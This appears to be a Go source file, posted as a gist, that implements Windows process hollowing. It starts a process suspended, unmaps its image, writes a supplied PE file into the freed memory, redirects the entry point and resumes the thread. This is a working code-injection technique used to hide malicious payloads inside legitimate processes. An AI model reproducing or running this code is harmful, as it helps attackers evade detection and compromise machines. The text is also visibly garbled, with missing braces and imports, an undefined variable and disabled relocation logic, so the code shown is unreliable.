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Created October 13, 2020 17:29
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package main
// Code modified from:
import (
var arch64 bool
func Inject(srcPath string, image []byte) {
cmd, err := syscall.UTF16PtrFromString(srcPath)
if err != nil { panic(err) }
Log("Creating process: %v", srcPath)
si := new(syscall.StartupInfo)
pi := new(syscall.ProcessInformation)
// CREATE_SUSPENDED := 0x00000004
err = syscall.CreateProcess(cmd, nil, nil, nil, false, 0x00000004, nil, nil, si, pi)
if err != nil { panic(err) }
hProcess := uintptr(pi.Process)
hThread := uintptr(pi.Thread)
Log("Process created. Process: %v, Thread: %v", hProcess, hThread)
Log("Getting thread context of %v", hThread)
ctx, err := GetThreadContext(hThread)
if err != nil { panic(err) }
Rdx := binary.LittleEndian.Uint64(ctx[136:])
Log("Address to PEB[Rdx]: %x", Rdx)
baseAddr, err := ReadProcessMemoryAsAddr(hProcess, uintptr(Rdx+16))
if err != nil { panic(err) }
//Log("Base Address of Source Image from PEB[ImageBaseAddress]: %x", baseAddr)
//Log("Reading destination PE")
//destPE, err := ioutil.ReadFile(destPath)
//if err != nil { panic(err) }
destPEReader := bytes.NewReader(image)
f, err := pe.NewFile(destPEReader)
Log("Getting OptionalHeader of destination PE")
var oh64, ok = f.OptionalHeader.(*pe.OptionalHeader64)
if !ok {
fmt.Println("OptionalHeader64 not found")
arch64 = false
var oh32, ok2 = f.OptionalHeader.(*pe.OptionalHeader32)
if !ok2 {
arch64 = true
Log("ImageBase of destination PE[OptionalHeader.ImageBase]: %x", oh64.ImageBase)
Log("Unmapping view of section %x", baseAddr)
if err := NtUnmapViewOfSection(hProcess, baseAddr); err != nil { panic(err) }
//Log("Allocating memory in process at %x (size: %v)", baseAddr, oh.SizeOfImage)
// MEM_COMMIT := 0x00001000
// MEM_RESERVE := 0x00002000
var newImageBase uintptr
if arch64 == true {
newImageBase, err := VirtualAllocEx(hProcess, baseAddr, oh64.SizeOfImage, 0x00002000|0x00001000, 0x40)
if err != nil {
} else {
newImageBase, err := VirtualAllocEx(hProcess, baseAddr, oh32.SizeOfImage, 0x00002000|0x00001000, 0x40)
if err != nil {
Log("New base address %x", newImageBase)
Log("Writing PE to memory in process at %x (size: %v)", newImageBase, oh.SizeOfHeaders)
err = WriteProcessMemory(hProcess, newImageBase, image, oh.SizeOfHeaders)
if err != nil { panic(err) }
for _, sec := range f.Sections {
Log("Writing section[%v] to memory at %x (size: %v)", sec.Name, newImageBase+uintptr(sec.VirtualAddress), sec.Size)
secData, err := sec.Data()
if err != nil { panic(err) }
err = WriteProcessMemory(hProcess, newImageBase+uintptr(sec.VirtualAddress), secData, sec.Size)
if err != nil { panic(err) }
Log("Calcuating relocation delta")
if arch64 == true {
delta := int64(oh.ImageBase) - int64(newImageBase)
} else {
Log("Relocation delta: %v", delta)
if delta != 0 && false {
Log("Finding relocation directory")
Log("Relocation directory %x (size: %v)", rel.VirtualAddress, rel.Size)
Log("Locating relocation section")
relSec := findRelocSec(rel.VirtualAddress, f.Sections)
if relSec == nil { panic(fmt.Sprintf(".reloc not found at %x", rel.VirtualAddress)) }
Log("Relocation section %x (size: %v)", relSec.VirtualAddress, relSec.Size)
var read uint32
d, err := relSec.Data()
if err != nil { panic(err) }
rr := bytes.NewReader(d)
for read < rel.Size {
Log("Reading relocation header")
dd := new(pe.DataDirectory)
binary.Read(rr, binary.LittleEndian, dd)
Log("Relocation header %x (size: %v)", dd.VirtualAddress, dd.Size)
read += 8
reSize := (dd.Size - 8) / 2
Log("Relocation entries %v", reSize)
re := make([]baseRelocEntry, reSize)
read += reSize * 2
binary.Read(rr, binary.LittleEndian, re)
for _, rrr := range re {
Log("Relocation entry: Type: %x Offset: %x", rrr.Type(), rrr.Offset()+dd.VirtualAddress)
if rrr.Type() == IMAGE_REL_BASED_DIR64 {
rell := newImageBase + uintptr(rrr.Offset()) + uintptr(dd.VirtualAddress)
raddr, err := ReadProcessMemoryAsAddr(hProcess, rell)
if err != nil { panic(err) }
err = WriteProcessMemoryAsAddr(hProcess, rell, uintptr(int64(raddr)+delta))
if err != nil { panic(err) }
} else {
Log("Invalid relocation entry type found %v", rrr.Type())
Log("Writing new ImageBase to Rdx %x", newImageBase)
addrB := make([]byte, 8)
binary.LittleEndian.PutUint64(addrB, uint64(newImageBase))
err = WriteProcessMemory(hProcess, uintptr(Rdx+16), addrB, 8)
if err != nil { panic(err) }
binary.LittleEndian.PutUint64(ctx[128:], uint64(newImageBase)+uint64(oh.AddressOfEntryPoint))
Log("Setting new entrypoint to Rcx %x", uint64(newImageBase)+uint64(oh.AddressOfEntryPoint))
Log("Setting thread context %v", hThread)
err = SetThreadContext(hThread, ctx)
if err != nil { panic(err) }
Log("Resuming thread %v", hThread)
_, err = ResumeThread(hThread)
if err != nil { panic(err) }
var (
modkernel32 = syscall.NewLazyDLL("kernel32.dll")
procWriteProcessMemory = modkernel32.NewProc("WriteProcessMemory")
procReadProcessMemory = modkernel32.NewProc("ReadProcessMemory")
procVirtualAllocEx = modkernel32.NewProc("VirtualAllocEx")
procGetThreadContext = modkernel32.NewProc("GetThreadContext")
procSetThreadContext = modkernel32.NewProc("SetThreadContext")
procResumeThread = modkernel32.NewProc("ResumeThread")
modntdll = syscall.NewLazyDLL("ntdll.dll")
procNtUnmapViewOfSection = modntdll.NewProc("NtUnmapViewOfSection")
func ResumeThread(hThread uintptr) (count int32, e error) {
ret, _, err := procResumeThread.Call(hThread)
if ret == 0xffffffff { e = err }
count = int32(ret)
Log("ResumeThread[%v]: [%v] %v", hThread, ret, err)
func VirtualAllocEx(hProcess uintptr, lpAddress uintptr, dwSize uint32, flAllocationType int, flProtect int) (addr uintptr, e error) {
ret, _, err := procVirtualAllocEx.Call(
if ret == 0 { e = err }
addr = ret
Log("VirtualAllocEx[%v : %x]: [%v] %v", hProcess, lpAddress, ret, err)
func ReadProcessMemory(hProcess uintptr, lpBaseAddress uintptr, size uint32) (data []byte, e error) {
var numBytesRead uintptr
data = make([]byte, size)
r, _, err := procReadProcessMemory.Call(hProcess,
if r == 0 { e = err }
Log("ReadProcessMemory[%v : %x]: [%v] %v", hProcess, lpBaseAddress, r, err)
func WriteProcessMemory(hProcess uintptr, lpBaseAddress uintptr, data []byte, size uint32) (e error) {
var numBytesRead uintptr
r, _, err := procWriteProcessMemory.Call(hProcess,
if r == 0 { e = err }
Log("WriteProcessMemory[%v : %x]: [%v] %v", hProcess, lpBaseAddress, r, err)
func GetThreadContext(hThread uintptr) (ctx []uint8, e error) {
ctx = make([]uint8, 1232)
// ctx[12] = 0x00100000 | 0x00000002 //CONTEXT_INTEGER flag to Rdx
binary.LittleEndian.PutUint32(ctx[48:], 0x00100000|0x00000002)
//other offsets can be found at
ctxPtr := unsafe.Pointer(&ctx[0])
r, _, err := procGetThreadContext.Call(hThread, uintptr(ctxPtr))
if r == 0 { e = err }
Log("GetThreadContext[%v]: [%v] %v", hThread, r, err)
return ctx, nil
func ReadProcessMemoryAsAddr(hProcess uintptr, lpBaseAddress uintptr) (val uintptr, e error) {
data, err := ReadProcessMemory(hProcess, lpBaseAddress, 8)
if err != nil { e = err }
val = uintptr(binary.LittleEndian.Uint64(data))
Log("ReadProcessMemoryAsAddr[%v : %x]: [%x] %v", hProcess, lpBaseAddress, val, err)
func WriteProcessMemoryAsAddr(hProcess uintptr, lpBaseAddress uintptr, val uintptr) (e error) {
buf := make([]byte, 8)
binary.LittleEndian.PutUint64(buf, uint64(val))
err := WriteProcessMemory(hProcess, lpBaseAddress, buf, 8)
if err != nil { e = err }
Log("WriteProcessMemoryAsAddr[%v : %x]: %v", hProcess, lpBaseAddress, err)
func NtUnmapViewOfSection(hProcess uintptr, baseAddr uintptr) (e error) {
r, _, err := procNtUnmapViewOfSection.Call(hProcess, baseAddr)
if r != 0 { e = err }
Log("NtUnmapViewOfSection[%v : %x]: [%v] %v", hProcess, baseAddr, r, err)
func SetThreadContext(hThread uintptr, ctx []uint8) (e error) {
ctxPtr := unsafe.Pointer(&ctx[0])
r, _, err := procSetThreadContext.Call(hThread, uintptr(ctxPtr))
if r == 0 { e = err }
Log("SetThreadContext[%v]: [%v] %v", hThread, r, err)
func Log(format string, args ...interface{}) {
fmt.Printf(format+"\n", args...)
type baseRelocEntry uint16
func (b baseRelocEntry) Type() IMAGE_REL_BASED {
return IMAGE_REL_BASED(uint16(b) >> 12)
func (b baseRelocEntry) Offset() uint32 {
return uint32(uint16(b) & 0x0FFF)
func findRelocSec(va uint32, secs []*pe.Section) *pe.Section {
for _, sec := range secs {
if sec.VirtualAddress == va { return sec }
return nil
type IMAGE_REL_BASED uint16
const (
IMAGE_REL_BASED_ABSOLUTE IMAGE_REL_BASED = 0 //The base relocation is skipped. This type can be used to pad a block.
IMAGE_REL_BASED_HIGH IMAGE_REL_BASED = 1 //The base relocation adds the high 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the high value of a 32-bit word.
IMAGE_REL_BASED_LOW IMAGE_REL_BASED = 2 //The base relocation adds the low 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the low half of a 32-bit word.
IMAGE_REL_BASED_HIGHLOW IMAGE_REL_BASED = 3 //The base relocation applies all 32 bits of the difference to the 32-bit field at offset.
IMAGE_REL_BASED_HIGHADJ IMAGE_REL_BASED = 4 //The base relocation adds the high 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the high value of a 32-bit word. The low 16 bits of the 32-bit value are stored in the 16-bit word that follows this base relocation. This means that this base relocation occupies two slots.
IMAGE_REL_BASED_MIPS_JMPADDR IMAGE_REL_BASED = 5 //The relocation interpretation is dependent on the machine type.When the machine type is MIPS, the base relocation applies to a MIPS jump instruction.
IMAGE_REL_BASED_ARM_MOV32 IMAGE_REL_BASED = 5 //This relocation is meaningful only when the machine type is ARM or Thumb. The base relocation applies the 32-bit address of a symbol across a consecutive MOVW/MOVT instruction pair.
IMAGE_REL_BASED_RISCV_HIGH20 IMAGE_REL_BASED = 5 //This relocation is only meaningful when the machine type is RISC-V. The base relocation applies to the high 20 bits of a 32-bit absolute address.
IMAGE_REL_BASED_THUMB_MOV32 IMAGE_REL_BASED = 7 //This relocation is meaningful only when the machine type is Thumb. The base relocation applies the 32-bit address of a symbol to a consecutive MOVW/MOVT instruction pair.
IMAGE_REL_BASED_RISCV_LOW12I IMAGE_REL_BASED = 7 //This relocation is only meaningful when the machine type is RISC-V. The base relocation applies to the low 12 bits of a 32-bit absolute address formed in RISC-V I-type instruction format.
IMAGE_REL_BASED_RISCV_LOW12S IMAGE_REL_BASED = 8 //This relocation is only meaningful when the machine type is RISC-V. The base relocation applies to the low 12 bits of a 32-bit absolute address formed in RISC-V S-type instruction format.
IMAGE_REL_BASED_MIPS_JMPADDR16 IMAGE_REL_BASED = 9 //The relocation is only meaningful when the machine type is MIPS. The base relocation applies to a MIPS16 jump instruction.
IMAGE_REL_BASED_DIR64 IMAGE_REL_BASED = 10 //The base relocation applies the difference to the 64-bit field at offset.
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